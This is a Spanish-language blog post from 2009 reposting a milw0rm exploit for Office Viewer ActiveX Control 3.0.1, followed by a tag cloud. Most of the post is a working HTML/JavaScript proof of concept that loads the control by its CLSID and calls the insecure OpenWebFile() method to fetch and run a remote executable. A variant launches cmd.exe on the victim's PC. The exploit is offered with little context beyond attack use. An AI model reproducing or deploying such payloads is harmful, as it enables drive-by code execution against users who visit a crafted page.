martes, 13 de enero de 2009

Office Viewer ActiveX Control 3.0.1 Remote File Execution Exploit

=======================================================================================

Author: Houssamix

=======================================================================================


Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit

download : http://www.anydraw.com/download/EOfficeOCX.exe



Tested on Windows XP Professional SP2 , with Internet Explorer 6



description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime

u can also execute a local file in pc victime usign this methode "Open()" , just change the function do_it with this :

function Do_it()
{
File = "c:\\windows\\system32\\cmd.exe"
hsmx.OpenWebFile(File)
}


=======================================================================================

<HTML>
<BODY>
<object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>

<SCRIPT>

function Do_it()
{
File = "http://test.com/file.exe"
hsmx.OpenWebFile(File)
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

# milw0rm.com [2009-01-13]
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)